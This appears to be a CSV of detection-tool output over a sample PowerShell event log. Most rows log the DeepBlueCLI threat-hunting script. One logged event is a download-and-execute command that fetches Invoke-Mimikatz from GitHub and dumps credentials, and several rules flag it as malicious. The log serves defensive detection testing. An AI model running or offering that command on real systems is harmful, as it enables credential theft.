+00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.578 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.581 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:27.201 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:27.201 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:27.202 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:27.203 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:27.734 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:49.131 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:56.217 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:03.586 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:03.586 +00:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:03.586 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:03.586 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:03.586 +00:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:03.586 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:12.696 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:14.161 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:28.002 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.553 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.559 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} """,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.559 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" 